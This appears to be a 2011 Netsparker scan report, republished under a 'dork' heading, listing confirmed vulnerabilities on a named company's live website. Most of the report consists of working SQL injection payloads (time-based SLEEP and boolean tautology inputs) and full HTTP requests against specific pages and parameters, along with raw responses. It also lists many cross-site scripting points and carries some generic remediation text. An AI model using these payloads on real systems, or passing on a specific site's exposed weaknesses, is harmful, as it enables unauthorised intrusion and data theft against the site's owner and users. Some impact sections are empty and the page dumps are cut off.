XSS, Cross Site Scripting in www.strategicvision.com, CWE-79, CAPEC-86, DORK, GHDB REPORT SUMMARY

Netsparker - Scan Report Summary

TARGET URL:     http://www.strategicvision.com/clients.php
SCAN DATE:      7/27/2011 8:49:20 PM
REPORT DATE:    7/28/2011 9:38:54 AM
SCAN DURATION:  01:08:04
TOTAL REQUESTS: 20777
AVERAGE SPEED:  5.09 req/sec.

FINDINGS: 50 identified, 45 confirmed, 6 critical, 6 informational

SCAN SETTINGS

PROFILE: Previous Settings
ENABLED ENGINES: Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting

VULNERABILITIES BY SEVERITY

CRITICAL:    12 %
IMPORTANT:   68 %
LOW:          8 %
INFORMATION: 12 %

VULNERABILITY SUMMARY

URL                          | Parameter | Method | Vulnerability                       | Confirmed
-----------------------------|-----------|--------|-------------------------------------|----------
/blog.php                    |           |        | Redirect Response BODY Is Too Large | Yes
/client_dao_authenticate.php | userID    | POST   | Cross-site Scripting                | Yes
/client_dao_authenticate.php | userID    | POST   | Cross-site Scripting                | Yes
/client_dao_login.php        |           |        | Password Transmitted Over HTTP      | Yes
/client_dao_login.php        |           |        | Auto Complete Enabled               | Yes
/clients.php                 |           |        | Cookie Not Marked As HttpOnly       | Yes
/clients.php                 |           |        | PHP Version Disclosure              | No
/clients.php                 |           |        | E-mail Address Disclosure           | No
/consumers.php               | numCars   | POST   | Cross-site Scripting                | Yes
/consumers.php               | yr2       | POST   | Cross-site Scripting                | Yes
/consumers.php               | mk2       | POST   | Cross-site Scripting                | Yes
/consumers.php               | mo2       | POST   | Cross-site Scripting                | Yes
/consumers.php               | yr4       | POST   | Cross-site Scripting                | Yes
/consumers.php               | numCars   | POST   | Cross-site Scripting                | Yes
/consumers.php               | yr2       | POST   | Cross-site Scripting                | Yes
/consumers.php               | mk2       | POST   | Cross-site Scripting                | Yes
/consumers.php               | mo2       | POST   | Cross-site Scripting                | Yes
/consumers.php               | yr4       | POST   | Cross-site Scripting                | Yes
/consumers.php               | mk4       | POST   | Cross-site Scripting                | Yes
/consumers.php               | numCars   | POST   | Cross-site Scripting                | Yes
/consumers.php               | yr2       | POST   | Cross-site Scripting                | Yes
/consumers.php               | mk2       | POST   | Cross-site Scripting                | Yes
/consumers.php               | mo2       | POST   | Cross-site Scripting                | Yes
/images/                     |           |        | Forbidden Resource                  | Yes
/press_release.php           | pr        | GET    | Blind SQL Injection                 | Yes
/press_release.php           | pr        | GET    | Boolean Based SQL Injection         | Yes
/ratings.php                 | Make      | POST   | Blind SQL Injection                 | Yes
/ratings.php                 | Make      | POST   | Boolean Based SQL Injection         | Yes
/ratings.php                 | numCars   | POST   | Cross-site Scripting                | Yes
/ratings.php                 | yr2       | POST   | Cross-site Scripting                | Yes
/ratings.php                 | mk2       | POST   | Cross-site Scripting                | Yes
/ratings.php                 | mo2       | POST   | Cross-site Scripting                | Yes
/ratings.php                 | yr4       | POST   | Cross-site Scripting                | Yes
/ratings.php                 | numCars   | POST   | Cross-site Scripting                | Yes
/ratings.php                 | yr2       | POST   | Cross-site Scripting                | Yes
/ratings.php                 | mk2       | POST   | Cross-site Scripting                | Yes
/ratings.php                 | mo2       | POST   | Cross-site Scripting                | Yes
/ratings.php                 | yr4       | POST   | Cross-site Scripting                | Yes
/ratings.php                 | mk4       | POST   | Cross-site Scripting                | Yes
/ratings.php                 | numCars   | POST   | Cross-site Scripting                | Yes
/ratings.php                 | yr2       | POST   | Cross-site Scripting                | Yes
/ratings.php                 | mk2       | POST   | Cross-site Scripting                | Yes
/ratings.php                 | mo2       | POST   | Cross-site Scripting                | Yes
/sitemap.xml                 |           |        | Apache Version Disclosure           | No
/sitemap.xml                 |           |        | Sitemap Identified                  | No
/sitemap.xml                 |           |        | Apache Version Is Out Of Date       | No
/team.php                    | person    | GET    | Blind SQL Injection                 | Yes
/team.php                    | person    | GET    | Boolean Based SQL Injection         | Yes
/team.php                    |           |        | MySQL Database Identified           | Yes
/view_ratings.php            | referrer  | POST   | Cross-site Scripting                | Yes
BLIND SQL INJECTION

Severity: CRITICAL
Instances: 3 total, 3 confirmed

SQL Injection occurs when data input, for example by a user, is interpreted by the backend database as a SQL command rather than as normal data. This is an extremely common vulnerability and its successful exploitation can have critical implications. Netsparker confirmed the vulnerability by executing a test SQL query on the back-end database. In these tests the SQL Injection was not obvious, but the page responded differently depending on the injection test, which allowed the SQL Injection to be identified and confirmed.

Impact

Depending on the backend database, the database connection settings and the operating system, an attacker can successfully mount one or more of the following types of attacks:

Actions to Take

  1. See the Remedy section for the solution.
  2. If you are not using a database access layer (DAL), consider using one. This lets you centralise the fix in one place. You can also use an ORM (object relational mapping). Most ORM systems use only parameterised queries, which can solve the whole SQL Injection problem.
  3. Locate all dynamically generated SQL queries and convert them to parameterised queries. (If you decide to use a DAL/ORM, change all legacy code to use the new libraries.)
  4. Use your web server logs and application logs to check whether this resource was previously attacked without being detected.

Remedy

A robust method for mitigating the threat of SQL Injection based vulnerabilities is to use parameterised queries (prepared statements). Almost all modern languages provide built-in libraries for this. Wherever possible, do not create dynamic SQL queries or SQL queries built with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to exploit SQL Injection vulnerabilities. This is a complex area with many dependencies; however, it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL Injection is one of the most common web application vulnerabilities.

Classification

OWASP A1, PCI v1.2-6.5.2, PCI v2.0-6.5.1, CWE-89, CAPEC-66, WASC-19

/team.php (CONFIRMED)

http://www.strategicvision.com/team.php?person=-111%20OR%20SLEEP(25)=0%20LIMIT%201--+

Parameters

Parameter Type Value
person GET -111 OR SLEEP(25)=0 LIMIT 1--

Request

GET /team.php?person=-111%20OR%20SLEEP(25)=0%20LIMIT%201--+ HTTP/1.1
Referer: http://www.strategicvision.com/clients.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.strategicvision.com
Cookie: PHPSESSID=vc79hagebb30pt9ttmk65djgu6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 01:50:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html


/press_release.php (CONFIRMED)

http://www.strategicvision.com/press_release.php?pr=-111%20OR%20SLEEP(25)=0%20LIMIT%201--+

Parameters

Parameter Type Value
pr GET -111 OR SLEEP(25)=0 LIMIT 1--

Request

GET /press_release.php?pr=-111%20OR%20SLEEP(25)=0%20LIMIT%201--+ HTTP/1.1
Referer: http://www.strategicvision.com/auto_research.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.strategicvision.com
Cookie: PHPSESSID=vc79hagebb30pt9ttmk65djgu6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 01:51:27 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html


/ratings.php (CONFIRMED)

http://www.strategicvision.com/ratings.php

Parameters

Parameter Type Value
Year POST 2011
Make POST -111' OR SLEEP(25)=0 LIMIT 1--
numCars POST 3
yr1 POST 3
mk1 POST 3
mo1 POST 3
yr2 POST 3
mk2 POST 3
mo2 POST 3
yr3 POST 3
mk3 POST 3
mo3 POST 3
yr4 POST 3
mk4 POST 3
mo4 POST 3
yr5 POST 3
mk5 POST 3
mo5 POST 3

Request

POST /ratings.php HTTP/1.1
Referer: http://www.strategicvision.com/ratings.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.strategicvision.com
Cookie: PHPSESSID=098bd1vhc6te46dd5rso7uj730
Content-Length: 156
Expect: 100-continue
Accept-Encoding: gzip, deflate

Year=2011&Make=-111%27%20OR%20SLEEP(25)=0%20LIMIT%201--+&numCars=3&yr1=3&mk1=3&mo1=3&yr2=3&mk2=3&mo2=3&yr3=3&mk3=3&mo3=3&yr4=3&mk4=3&mo4=3&yr5=3&mk5=3&mo5=3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 02:51:40 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html

Boolean Based SQL Injection

3 TOTAL
CRITICAL
CONFIRMED 3
SQL Injection occurs when data input, for example by a user, is interpreted by the backend database as a SQL command rather than as ordinary data. This is an extremely common vulnerability and its successful exploitation can have critical implications. Netsparker confirmed the vulnerability by executing a test SQL query on the back-end database. In these tests the SQL Injection was not obvious, but the page's differing responses to the injection tests allowed Netsparker to identify and confirm it.

Impact

Depending on the backend database, the database connection settings and the operating system, an attacker can successfully mount one or more of the following types of attack:

Actions to Take

  1. See the Remedy section for the solution.
  2. If you are not using a database access layer (DAL), consider using one. This will help you to centralise the fix. You can also use an ORM (object relational mapping); most ORM systems use only parameterised queries, which can solve the whole SQL Injection problem.
  3. Locate all of the dynamically generated SQL queries and convert them to parameterised queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries.)
  4. Use your web server logs and application logs to check whether there was any previous, undetected attack against this resource.

Remedy

The best way to protect your code against SQL Injection is to use parameterised queries (prepared statements). Almost all modern languages provide built-in libraries for this. Wherever possible, do not build dynamic SQL queries or SQL queries by string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to exploit SQL Injection vulnerabilities. This is a complex area with many dependencies; however, the numerous resources available in this area have raised both attacker awareness of the issue and their ability to discover and leverage it.

External References

Remedy References

Classification

OWASP A1 PCI v1.2-6.5.2 PCI v2.0-6.5.1 CWE-89 CAPEC-66 WASC-19
- /team.php

/team.php CONFIRMED

http://www.strategicvision.com/team.php?person=-1+OR+17-7%3d10

Parameters

Parameter Type Value
person GET -1 OR 17-7=10

Request

GET /team.php?person=-1+OR+17-7%3d10 HTTP/1.1
Referer: http://www.strategicvision.com/clients.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.strategicvision.com
Cookie: PHPSESSID=vc79hagebb30pt9ttmk65djgu6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 01:50:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html

- /press_release.php

/press_release.php CONFIRMED

http://www.strategicvision.com/press_release.php?pr=-1+OR+17-7%3d10

Parameters

Parameter Type Value
pr GET -1 OR 17-7=10

Request

GET /press_release.php?pr=-1+OR+17-7%3d10 HTTP/1.1
Referer: http://www.strategicvision.com/auto_research.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.strategicvision.com
Cookie: PHPSESSID=vc79hagebb30pt9ttmk65djgu6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 01:51:26 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html

<br />
Among GM brands, Chevrolet led with four wins (1 a tie), followed by Cadillac (3 wins; 1 a tie), Saturn (tied in 2 segments) and Buick (tied in 1 segment). "GM has been saying for some time that's it's improving its products," says Strategic Vision vice president Daniel Gorrell, "so they should be proud that many of their buyers agree. The challenge will be to continue this momentum and regain the trust, and then the hearts and minds of the U.S. car and truck buyer."<br />
<br />
TQI, the premier measure of new vehicle owner satisfaction, assesses new buyers' responses to the complete ownership experience, including buying, owning and driving their new vehicles. The calculations also include the emotional response to that experience.<br />
<br />
In addition to the Santa Fe's repeat win in the small SUV segment, Hyundai's Elantra and Sonata were co-leaders in their segments. Nissan Motor also had three wins (2 were ties), two for Infiniti and one for Nissan. The other domestic manufacturers each had two wins, as did Honda (with one for each a tie). The Lexus 430 was Toyota's only top scorer.<br />
<br />
Infiniti and Mercedes Benz were the highest scoring brands, while Cadillac continued in second place, tying with Jaguar and Lexus. Mitsubishi and Dodge were the most improved brands. "The real challenge for GM and other brands who are turning their products around," says Gorrell, "is to convince potential buyers, particularly entrenched Toyota and Honda owners, to take a look."<br />
<br />
Buyers rated the following vehicles tops in their segments: (closely ranked scores, if the differences are not statistically significant, are considered ties)<br />
<br />
<hr noshade="noshade" size="1"><br />
<p><table border="0" cellpadding="5" cellspacing="0" width="100%" class="text"> <tr class="boldtext" bgcolor="#EEEEEE"><td>Segment</td><td>Winner(s)</td><td align="center">TQI Score</td></tr><tr> <td valign="top"><a href="auto_segmentwinners.php?year=2004&award=TQA&seg=1">Small Car</a></td> <td valign="top">Hyundai Elantra<br />Saturn Ion</td> <td valign="top" align="center">867</td></tr><tr bgcolor="#EEEEEE"> <td valign="top"><a href="auto_segmentwinners.php?year=2004&award=TQA&seg=2">Compact Car</a></td> <td valign="top">Chevrolet Malibu</td> <td valign="top" align="center">883</td></tr><tr> <td valign="top"><a href="auto_segmentwinners.php?year=2004&award=TQA&seg=3">Compact Wagons</a></td> <td valign="top">Volkswagen Jetta Wagon</td> <td valign="top" align="center">840</td></tr><tr bgcolor="#EEEEEE"> <td valign="top"><a href="auto_segmentwinners.php?year=2004&award=TQA&seg=4">Mid-Size Car</a></td> <td valign="top">Acura TSX</td> <td valign="top" align="center">888</td></tr><tr> <td valign="top"><a href="auto_segmentwinners.php?year=2004&award=TQA&seg=5">Mid-Size Wagon</a></td> <td valign="top">Volkswagen Passat Wagon</td> <td valign="top" align="center">856</td></tr><tr bgcolor="#EEEEEE"> <td valign="top"><a href="auto_segmentwinners.php?year=2004&award=TQA&seg=6">Larger Car</a></td> <td valign="top">Chrysler Concorde<br />Buick LeSabre</td> <td valign="top" align="center">851</td></tr><tr> <td valign="top"><a href="auto_segmentwinners.php?year=2004&award=TQA&seg=7">Sporty Coupes Under $25,000</a></td> <td valign="top">Mini Cooper</td> <td valign="top" align="center">903</td></tr><tr bgcolor="#EEEEEE"> <td valign="top"><a href="auto_segmentwinners.php?year=2004&award=TQA&seg=8">Sporty Coupes Over $25,000</a></td> <td valign="top">Chevrolet Corvette</td> <td valign="top" align="center">905</td></tr><tr> <td valign="top"><a href="auto_segmentwinners.php?year=2004&award=TQA&seg=9">Mid-Specialty Car</a></td> <td valign="top">Chevrolet Monte Carlo</td> <td 
valign="top" align="center">885</td></tr><tr bgcolor="#EEEEEE"> <td valign="top"><a href="auto_segmentwinners.php?year=2004&award=TQA&seg=10">Near Luxury Car</a></td> <td valign="top">Infiniti G35 Sedan</td> <td valign="top" align="center">900</td></tr><tr> <td valign="top"><a href="auto_segmentwinners.php?year=2004&award=TQA&seg=11">Luxury/Sport Wagons</a></td> <td valign="top">Audi Allroad Quattro</td> <td valign="top" align="center">890</td></tr><tr bgcolor="#EEEEEE"> <td valign="top"&..
- /ratings.php

/ratings.php CONFIRMED

http://www.strategicvision.com/ratings.php

Parameters

Parameter Type Value
Year POST 2011
Make POST ' OR 'ns'='ns
numCars POST 3
yr1 POST 3
mk1 POST 3
mo1 POST 3
yr2 POST 3
mk2 POST 3
mo2 POST 3
yr3 POST 3
mk3 POST 3
mo3 POST 3
yr4 POST 3
mk4 POST 3
mo4 POST 3
yr5 POST 3
mk5 POST 3
mo5 POST 3

Request

POST /ratings.php HTTP/1.1
Referer: http://www.strategicvision.com/ratings.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.strategicvision.com
Cookie: PHPSESSID=098bd1vhc6te46dd5rso7uj730
Content-Length: 130
Expect: 100-continue
Accept-Encoding: gzip, deflate

Year=2011&Make='+OR+'ns'%3d'ns&numCars=3&yr1=3&mk1=3&mo1=3&yr2=3&mk2=3&mo2=3&yr3=3&mk3=3&mo3=3&yr4=3&mk4=3&mo4=3&yr5=3&mk5=3&mo5=3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 02:51:35 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html



<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Strategic Vision - Automotive Ratings</title>
<script type="text/javascript" language="JavaScript" src="scripts/ratings.js"></script>
<!--META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"--><link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" /><link rel="stylesheet" href="format.css" type="text/css" /><link rel="stylesheet" href="navbar.css" type="text/css" /><script language="JavaScript" type="text/javascript" src="scripts/functions.js"></script><script language="JavaScript" type="text/javascript" src="scripts/navbar.js"></script></head><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1931555-7");pageTracker._trackPageview();} catch(err) {}</script><meta name="google-site-verification" content="co3cp8LCCaiJv7xvKXlDyD1GnS4aS8p2ytrk5iiNcxk" /><body style="background-color: #CCCCCC;"> <a name="top"></a> <div id="pagehead"> <table border="0" cellpadding="0" cellspacing="0" width="790" height="71" align="center" class="text"> <tr> <td bgcolor="#003466">&nbsp;</td> <td align="left" width="480" background="images/pagehead_highlight.png"> <div id="logo"><a href="index.php"><img src="images/sv_logo.png" alt="Strategic Vision" width="195" height="70" border="0" title="Strategic Vision" /></a></div> </td> <td valign="bottom" align="right" width="300" class="userinfo" background="images/pagehead_highlight.png"> <p> &nbsp;</p> </td> <td bgcolor="#003466">&nbsp;</td> </tr> </table></div> <center> <div id="toolbar" style="z-index=1;"> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center"><tr> <td width="5">&nbsp;</td> <td width="780"> <div id="topNav" class="navBar"> <!-- HOME --> <div class="collapsed"> <div class="navItem"><a href="index.php">HOME</a></div> </div> <!-- CONSUMERS --> <div class="collapsed"> <div class="navItem"><a href="consumers.php">CONSUMERS</a></div> 
<div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="ratings.php">Automotive Ratings</a></div> <div class="dropItem"><a href="auto_research.php">About our Ratings</a></div> <!--<div class="dropItem"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--> <div class="dropItem"><a href="surveys.php">Surveys</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="sweepstakes_winners.php">Sweepstakes</a></div> </div> </div> </div> <!-- RESEARCH --> <div class="collapsed"> <div class="navItem"><a href="research.php">RESEARCH</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="auto_research.php">Automotive</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="auto_tqa.php">Total Quality</a></div> <div class="dropItem"><a href="auto_tvi.php">Total Value</a></div> <div class="dropItem"><a href="auto_delight.php">Delight</a></div> <div class="dropItem"><a href="auto_pim.php">Problem Impact</a></div> <div class="dropItem"><a href="auto_ethnic_report_2006.php">Ethnic Report</a></div> </div> </div> <div class="dropItem"><a href="govt_research.php">Government</a></div> <div class="dropItem"><a href="jury_research.php">Jury</a></div> <div class="dropItem"><a href="org_intervention.php">Organizational Intervention</a></div> <div class="dropItem"><a href="via_research.php">Values In America</a></div> <div class="rule"></div> <div class="dropItem"><a href="method.php">ValueCentered Method</a></div> </div> </div> </div> <!-- RATINGS --> <div class="collapsed"> <div class="navItem"><a href="services.php">SERVICES</a></div> </div> <!-- METHOD --> <div class="collapsed"> <div class="navItem"><a href="method.php">METHOD</a></div> </div> <!-- COMPANY --> <div class="collapsed"> <div class="navItem"><a 
href="company.php">COMPANY</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="team.php">Team</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="team.php?person=1">Dr. Darrel Edwards</a></div> <div class="dropItem"><a href="team.php?person=8">J. Susan Johnson</a></div><div class="dropItem"><a href="team.php?person=9">Sharon D. Shedroff</a></div><div class="dropItem"><a href="team.php?person=11">Alexander H. Edwards</a></div><div class="dropItem"><a href="team.php?person=12">Alex Hare</a></div><div class="dropItem"><a href="team.php?person=13">Charles Borough</a></div><div class="dropItem"><a href="team.php?person=14">Christopher Chaney</a></div><div class="dropItem"><a href="team.php?person=30">Margo Jay</a></div> </div> </div> <div class="dropItem"><a href="clients.php">Clients</a></div> <div class="dropItem"><a href="charity.php">Charity</a></div> <div class="rule"></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> </div> </div> </div> <!-- CLIENTS --> <div class="collapsed"> <div class="navItem"><a href="clients.php">CLIENTS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="clients.php">Past Clients</a></div> <!--<div class="dropItem"><a href="clients.php">Success Stories</a></div>--> <!--<div class="dropItem"><a href="client_dao_login.php">DAO Login</a></div>--> </div> </div> </div> <!-- PRESS --> <div class="collapsed"> <div class="navItem"><a href="press.php">PRESS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="press_auto.php">Automotive Press</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> <div class="dropItem"><a href="press_rss.php">RSS 
Feeds</a></div> </div> </div> </div> </div> </td> <td width="5">&nbsp;</td> </tr></table></div> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center" height="90%"><tr> <td width="5" bgcolor="#CCCCCC" background="images/content_leftshadow.gif">&nbsp;</td> <td width="780" bgcolor="#FFFFFF" valign="top"> <div id="content" class="center_div"> <div style="height:3px;"></div>
<table width="100%" class="text" cellpadding="5">
<tr>
<td width="150" align="left" valign="top"><div class="sidemenu_head">RESEARCH</div><div class="sidemenu_item"><a href="research.php">Overview</a></div><div class="sidemenu_item"> <a href="auto_research.php">Automotive</a></div><div class="sidemenu_item"><a href="govt_research.php">Government</a></div><div class="sidemenu_item"><a href="jury_research.php">Jury</a></div><div class="sidemenu_item"><a href="org_intervention.php">Organizational Intervention</a></div><div class="sidemenu_item"><a href="via_research.php">Values In America</a></div><div class="sidemenu_item"><a href="method.php">ValueCentered Method</a></div><div class="sidemenu_item"><a href="surveys.php">Survey Login</a></div><br /><br /><div class="sidemenu_head">SITE TOOLS</div><div class="sidemenu_item"><a href="javascript:window.print();"><img src="images/icon_printpage.gif" border="0" height="13" width="12" align="middle">&nbsp; Print This Page</a></div><!--<div class="sidemenu_item"><a href="javascript:emailToAFriend('http://www.strategicvision.com');"><img src="images/icon_email.gif" border="0" height="10" width="12" align="middle">&nbsp; E-mail to a Friend</a></div>--><br /></td>
<td align="left" valign="top">
<!-- Start the content -->
<div class="pagetitle"><img src="images/pagetitle_dots.gif" width="9" height="10" align="middle" />&nbsp;Automotive Ratings</div>
<div class="pagetext">

<p>Search hundreds of car ratings obtained by Strategic Vision's renowned New Vehicle Experience Study (NVES) surveys, which gather information from thousands of individuals.</p>
<p>Simply choose up to five vehicles that you would like to compare, and click "View Ratings."</p>

<p class="boldtext">View the top winners</p>
<ul>
<li><a href="auto_tqa_winners.php">Total Quality Winners</a></li>
<!-- <li><a href="auto_tva_winners.php">Total Value Winners</a></li> -->
<!--<li><a href="auto_mdv_winners.php">Most Delightful Winners</a></li>-->
<!--<li><a href="auto_pim_winners.php">Problem Impact Measure Winners</a></li>-->
</ul>

<div id="fieldset">
<div class="pagetitle_small">Select a car</div>
<form name="ratingsSelection" action="ratings.php" method="post">
<table border="0" cellpadding="2" cellspacing="0" class="text">
<tr>
<td width="65">Year</td>
<td width="135">Manufacturer</td>
<td colspan="2" width="200">Model</td>
</tr>
<tr>
<td><select name="Year" id="Year" onChange="submit();"><option>---</option><option value="2011" selected>2011</option><option value="2010">2010</option><option value="2009">2009</option><option value="2008">2008</option><option value="2007">2007</option><option value="2006">2006</option><option value="2005">2005</option><option value="2004">2004</option></select></td><td><select name="Make" id="Make" onChange="submit();"><option>---</option><option value="Acura">Acura</option><option value="Audi">Audi</option><option value="BMW">BMW</option><option value="Buick">Buick</option><option value="Cadillac">Cadillac</option><option value="Chevrolet">Chevrolet</option><option value="Chrysler">Chrysler</option><option value="Dodge">Dodge</option><option value="Ford">Ford</option><option value="GMC">GMC</option><option value="Honda">Honda</option><option value="Hyundai">Hyundai</option><option value="Infiniti">Infiniti</option><option value="Jaguar">Jaguar</option><option value="Jeep">Jeep</option><option value="Kia">Kia</option><option value="Land Rover">Land Rover</option><option value="Lexus">Lexus</option><option value="Lincoln">Lincoln</option><option value="Mazda">Mazda</option><option value="Mercedes-Benz">Mercedes-Benz</option><option value="Mercury">Mercury</option><option value="MINI">MINI</option><option value="Mitsubishi">Mitsubishi</option><option value="Nissan">Nissan</option><option value="Porsche">Porsche</option><option value="Ram">Ram</option><option value="Saab">Saab</option><option value="Scion">Scion</option><option value="Segment">Segment</option><option value="Subaru">Subaru</option><option value="Suzuki">Suzuki</option><option value="Toyota">Toyota</option><option value="Volkswagen">Volkswagen</option><option value="Volvo">Volvo</option></select></td><td><select name="Model" id="Model" onChange="submit();"><option>---</option><option value="1-Series Convertible">1-Series Convertible</option><option value="1-Series Coupe">1-Series Coupe</option><option 
value="1500">1500</option><option value="2">2</option><option value="2500/3500">2500/3500</option><option value="3 Hatchback">3 Hatchback</option><option value="3 Sedan">3 Sedan</option><option value="3-Series Convertible">3-Series Convertible</option><option value="3-Series Coupe">3-Series Coupe</option><option value="3-Series Sedan">3-Series Sedan</option><option value="300">300</option><option value="300C">300C</option><option value="300S">300S</option><option value="370Z Convertible">370Z Convertible</option><option value="370Z Coupe">370Z Coupe</option><option value="4Runner">4Runner</option><option value="5">5</option><option value="5-Series Sedan">5-Series Sedan</option><option value="6 Sedan">6 Sedan</option><option value="6-Series Convertible">6-Series Convertible</option><option value="6-Series Coupe">6-Series Coupe</option><option value="7-Series Hybrid Sedan">7-Series Hybrid Sedan</option><option value="7-Series Sedan">7-Series Se..
Cross-site Scripting

33 TOTAL
IMPORTANT
CONFIRMED
33
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application. This opens several attack opportunities, most commonly hijacking the current user's session or altering the page's HTML on the fly to steal the user's credentials. It happens because input entered by a user is interpreted as HTML/JavaScript/VBScript by the browser.

XSS targets the users of the application rather than the server. Although this is a limitation, it still allows an attacker to hijack other users' sessions, and by attacking an administrator an attacker may gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:

Remedy

The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, all input to and output from the application should be filtered. Output should be filtered according to its format and location; typically the output location is HTML. Where the output is HTML, ensure that all active content is removed before it is sent to the browser.

Before sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which to populate a white-list. This list needs to be defined only once and should be used to sanitize and validate all subsequent input.

A number of pre-defined, well-structured white-list libraries are available for many different environments; OWASP Reform and the Microsoft Anti-Cross-site Scripting library are good examples.

Remedy References

External References

Classification

OWASP A2 PCI v1.2-6.5.1 PCI v2.0-6.5.7 CWE-79 CAPEC-19 WASC-08
- /ratings.php

/ratings.php CONFIRMED

http://www.strategicvision.com/ratings.php

Parameters

Parameter Type Value
Year POST 3
